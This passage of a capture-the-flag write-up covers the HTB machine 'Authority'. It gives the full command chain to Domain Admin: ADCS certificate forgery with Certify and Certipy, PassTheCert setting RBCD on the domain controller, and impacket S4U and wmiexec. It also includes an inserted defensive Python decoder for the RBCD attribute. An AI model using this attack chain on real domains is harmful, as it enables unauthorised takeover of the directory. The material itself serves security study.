In this case the only enrollees on the vulnerable template are Domain Computers.
Sure enough, requesting the template as svc_ldap fails with the following error.

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> .\Certify.exe request /ca:authority.authority.htb\AUTHORITY-CA /template:CorpVPN /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : HTB\svc_ldap
[*] No subject name specified, using current context as subject.

[*] Template                : CorpVPN
[*] Subject                 : CN=svc_ldap, OU=Service Accounts, OU=CORP, DC=authority, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : authority.authority.htb\AUTHORITY-CA

[!] CA Response             : The submission failed: Denied by Policy Module
[!] Last status             : 0x80094012. Message: The permissions on the certificate template do not allow the current user to enroll for this type of certificate. (Exception from HRESULT: 0x80094012)
[*] Request ID              : 3

[*] cert.pem         :


[X] Error downloading certificate: Cert not yet issued yet! (iDisposition: 2)

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Attack on ADCS

Since a Domain Computer can use the vulnerable template, the idea is to simply create a new computer account.

Add New Computer

To make the creation easier, import the following PowerShell modules first.

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> Import-Module C:\Users\svc_ldap\Desktop\Powermad.ps1

Now run the following creation command. Set the password to something arbitrary such as 123456.

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> New-MachineAccount -MachineAccount TEST -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Domain authority.htb -DomainController authority.authority.htb -Verbose

Certipy

We have to log in as the TEST$ computer created above and request the certificate template, so we run Certipy, which does both in one go. Refer to the following repository.

Running it produces the following error.

┌──(root㉿kali)-[~/work]
└─# certipy req -username TEST@authority.htb -password 123456 -ca AUTHORITY-CA  -dc-ip 10.129.11.152 -template CorpVPN -upn Administrator@AUTHORITY.HTB -debug -target authority.authority.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[!] Failed to connect to endpoint ncacn_np:10.129.11.152[\pipe\cert]: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[+] Trying to resolve dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE'
[+] Resolved dynamic endpoint '91AE6020-9E3C-11CF-8D7C-00AA00C091BE' to 'ncacn_ip_tcp:10.129.11.152[49722]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:10.129.11.152[49722]
[+] Connected to endpoint: ncacn_ip_tcp:10.129.11.152[49722]
[-] Got error: Unknown DCE RPC fault status code: 00000721
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/certipy/entry.py", line 60, in main
    actions[options.action](options)
  File "/usr/local/lib/python3.11/dist-packages/certipy/commands/parsers/req.py", line 12, in entry
    req.entry(options)
  File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 767, in entry
    request.request()
  File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 718, in request
    cert = self.interface.request(csr, attributes)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/certipy/commands/req.py", line 208, in request
    response = self.dce.request(request)
               ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 859, in request
    answer = self.recv()
             ^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1332, in recv
    raise DCERPCException('Unknown DCE RPC fault status code: %.8x' % status_code)
impacket.dcerpc.v5.rpcrt.DCERPCException: Unknown DCE RPC fault status code: 00000721

The error appears to come from a clock skew with the DC, so resolve it with ntpdate.

┌──(root㉿kali)-[~/work]
└─# ntpdate 10.129.11.152
2023-07-19 02:48:28.172973 (-0400) +14391.840508 +/- 0.138896 10.129.11.152 s1 no-leap
CLOCK: time stepped by 14391.840508
┌──(root㉿kali)-[~/work]
└─# certipy req -username TEST$@AUTHORITY.HTB -password 123456 -ca AUTHORITY-CA -dc-ip 10.129.11.152 -template CorpVPN -upn Administrator@AUTHORITY.HTB -debug -target authority.authority.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'authority.authority.htb' at '10.129.11.152'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.11.152[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'Administrator@AUTHORITY.HTB'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

administrator.pfx has been created, so we use it to request authentication from Kerberos.

┌──(root㉿kali)-[~/work]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.11.152 
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Denied.
Ugh... this is clearly harder than Escape from the other day.

PassTheCert

Exploit analysis

When the certificate does not contain the Smart Card Logon Extended Key Usage, the KDC_ERR_PADATA_TYPE_NOSUPP error above can occur. In that situation, privilege escalation through Kerberos authentication with the certificate is not possible.

So the idea becomes to use the forged certificate against a different protocol. Authentication over TLS includes LDAPS, for example, and the plan is to attack through that protocol.

This line of thinking is described in detail in the PassTheCert documentation below, so it is worth a read.

Those documents also describe concrete ways to carry out the attack (here, the Resource-Based Constrained Delegation attack). We can create machine accounts, and since we hold the certificate we can also set _msDS-AllowedToActOnBehalfOfOtherIdentity_, so this looks promising and is worth a try. For RBCD attacks, refer to the following.

First, obtain PassTheCert.exe to carry out this attack. The binary is taken from the following repository.

Running PassTheCert

Create DESKTOP-1337$ using the certificate that impersonates Administrator.

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> .\PassTheCert.exe --server 127.0.0.1 --cert-path C:\Users\svc_ldap\Documents\administrator.pfx --add-computer --computer-name DESKTOP-1337$
No password given, generating random one.
Generated password: 99U1VOMhRX6LEvISJJQ9PMo07osUJLcp
Success

To inspect the directory entry of the domain controller authority, run the following command.

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> Get-DomainComputer authority


pwdlastset                               : 6/22/2023 2:29:41 PM
logoncount                               : 1322
msds-generationid                        : {164, 41, 7, 98...}
serverreferencebl                        : CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
badpasswordtime                          : 12/31/1600 7:00:00 PM
msds-additionaldnshostname               : {authority.htb.corp, AUTHORITY}
distinguishedname                        : CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
objectclass                              : {top, person, organizationalPerson, user...}
displayname                              : AUTHORITY$
lastlogontimestamp                       : 7/18/2023 8:30:26 PM
name                                     : AUTHORITY
primarygroupid                           : 516
objectsid                                : S-1-5-21-622327497-3269355298-2248959698-1000
samaccountname                           : AUTHORITY$
localpolicyflags                         : 0
codepage                                 : 0
samaccounttype                           : MACHINE_ACCOUNT
whenchanged                              : 7/19/2023 10:42:41 AM
accountexpires                           : NEVER
cn                                       : AUTHORITY
operatingsystem                          : Windows Server 2019 Standard
instancetype                             : 4
msdfsr-computerreferencebl               : CN=AUTHORITY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=authority,DC=htb
objectguid                               : 23c88ddb-c76e-41bd-8b75-dd04e08431cc
operatingsystemversion                   : 10.0 (17763)
lastlogoff                               : 12/31/1600 7:00:00 PM
msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}

We add the SID of the newly created DESKTOP-1337$ to this object's msDS-AllowedToActOnBehalfOfOtherIdentity.
First, look up that SID.
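Added example, not part of the original writeup, written from the defender's side: msDS-AllowedToActOnBehalfOfOtherIdentity is a self-relative security descriptor (which is why PowerView prints it as {1, 0, 4, 128...}: revision 1, control 0x8004), and decoding it lists exactly which SIDs may act on behalf of the DC. The builder exists only to construct the sample descriptor for the test; the access mask value and helper names are assumptions.

```python
import struct

def sid_to_string(buf, off):
    """Decode a binary SID at buf[off:]; returns (string SID, bytes consumed)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count

def string_to_sid(sid):
    parts = sid.split("-")                      # ["S", "1", "5", "21", ...]
    subs = [int(p) for p in parts[3:]]
    return (bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def rbcd_allowed_sids(sd):
    """SIDs with an ACCESS_ALLOWED ACE in the DACL of a self-relative descriptor.
    Header: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004 or off_dacl == 0:   # SE_DACL_PRESENT not set
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)   # ACL header
    pos, allowed = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _ = struct.unpack_from("<BBHI", sd, pos)   # ACE header
        if ace_type == 0:                                   # ACCESS_ALLOWED_ACE_TYPE
            allowed.append(sid_to_string(sd, pos + 8)[0])
        pos += ace_size
    return allowed

def build_sample_descriptor(sids, mask=0x000F01FF):
    """Construct a descriptor with one allow ACE per SID (sample input only)."""
    aces = b""
    for sid in sids:
        s = string_to_sid(sid)
        aces += struct.pack("<BBHI", 0, 0, 8 + len(s), mask) + s
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    # control 0x8004 = SE_SELF_RELATIVE | SE_DACL_PRESENT; DACL follows the 20-byte header
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl

# Constructed sample: the rogue computer SID that the writeup adds to the DC object.
SAMPLE_SD = build_sample_descriptor(["S-1-5-21-622327497-3269355298-2248959698-12106"])

if __name__ == "__main__":
    print(list(SAMPLE_SD[:4]))                  # [1, 0, 4, 128], as PowerView shows
    for sid in rbcd_allowed_sids(SAMPLE_SD):
        print("allowed to act on behalf of this object:", sid)
```

On a domain controller this attribute should normally be empty, so any SID the decoder returns for a DC object, especially one belonging to a freshly created workstation account, is worth an alert.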

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> Get-DomainComputer DESKTOP-1337


pwdlastset             : 7/19/2023 7:14:53 AM
logoncount             : 0
badpasswordtime        : 12/31/1600 7:00:00 PM
distinguishedname      : CN=DESKTOP-1337,CN=Computers,DC=authority,DC=htb
objectclass            : {top, person, organizationalPerson, user...}
name                   : DESKTOP-1337
objectsid              : S-1-5-21-622327497-3269355298-2248959698-12106
samaccountname         : DESKTOP-1337$
localpolicyflags       : 0
codepage               : 0
samaccounttype         : MACHINE_ACCOUNT
accountexpires         : NEVER
countrycode            : 0
whenchanged            : 7/19/2023 11:14:53 AM
instancetype           : 4
usncreated             : 266585
objectguid             : 41ecd55b-1ede-450f-bbc3-440d73db785f
lastlogoff             : 12/31/1600 7:00:00 PM
objectcategory         : CN=Computer,CN=Schema,CN=Configuration,DC=authority,DC=htb
dscorepropagationdata  : 1/1/1601 12:00:00 AM
serviceprincipalname   : {RestrictedKrbHost/DESKTOP-1337.authority.htb, RestrictedKrbHost/DESKTOP-1337, HOST/DESKTOP-1337.authority.htb, HOST/DESKTOP-1337}
lastlogon              : 12/31/1600 7:00:00 PM
badpwdcount            : 0
cn                     : DESKTOP-1337
useraccountcontrol     : WORKSTATION_TRUST_ACCOUNT
whencreated            : 7/19/2023 11:14:53 AM
primarygroupid         : 515
iscriticalsystemobject : False
usnchanged             : 266587
dnshostname            : DESKTOP-1337.authority.htb

Good, the SID is confirmed, so now add DESKTOP-1337$'s SID.

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> .\PassTheCert.exe --server 127.0.0.1 --cert-path C:\Users\svc_ldap\Documents\administrator.pfx --rbcd --target "CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb" --sid "S-1-5-21-622327497-3269355298-2248959698-12106"
msDS-AllowedToActOnBehalfOfOtherIdentity attribute exists. Saving old value to disk.
You can restore it using arguments:
        --target "CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb" --restore CN=AUTHORITY,OU=Domain_Controllers,DC=authority,DC=htb_msDS-AllowedToActOnBehalfOfOtherIdentity_20230719T071538Z.txt
Success

All that remains is to carry out the RBCD attack.

RBCD attack

We use the MS-SFU Kerberos extension (S4U) to obtain a service ticket (ST) from the TGS.
impacket's getST can issue the constrained-delegation proxy request for us, which is convenient.

┌──(root㉿kali)-[~/work]
└─# impacket-getST -spn 'cifs/authority.authority.htb' -impersonate Administrator 'authority.htb/DESKTOP-1337$:99U1VOMhRX6LEvISJJQ9PMo07osUJLcp'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

The ST is stored in Administrator.ccache, so point the environment variable at it.

┌──(root㉿kali)-[~/work]
└─# export KRB5CCNAME=Administrator.ccache

We now hold an ST for cifs, so we go straight in.

┌──(root㉿kali)-[~/work]
└─# impacket-wmiexec -k -no-pass authority.htb/Administrator@authority.authority.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

Ugh... fix the clock again.

┌──(root㉿kali)-[~/work]
└─# ntpdate 10.129.7.87                                                             
2023-07-19 07:17:42.120146 (-0400) +14397.602014 +/- 0.123917 10.129.7.87 s1 no-leap
CLOCK: time stepped by 14397.602014

After repeating this cycle a few times, I finally got in.

┌──(root㉿kali)-[~/work]
└─# impacket-wmiexec -k -no-pass authority.htb/Administrator@authority.authority.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

Administrator privileges obtained!!!

Summary

With this, privilege escalation succeeded and Administrator privileges were obtained.
Exploiting the vulnerability after finding it is difficult, which makes this a good study of PassTheCert.
For the second half, abusing ADCS for privilege escalation, there is also the following material I presented at a lightning talk, so take a look.

Personally, I felt this box is a superior version of Escape.
Shouldn't this be rated Hard????

Tomorrow's post is by @takao-h.
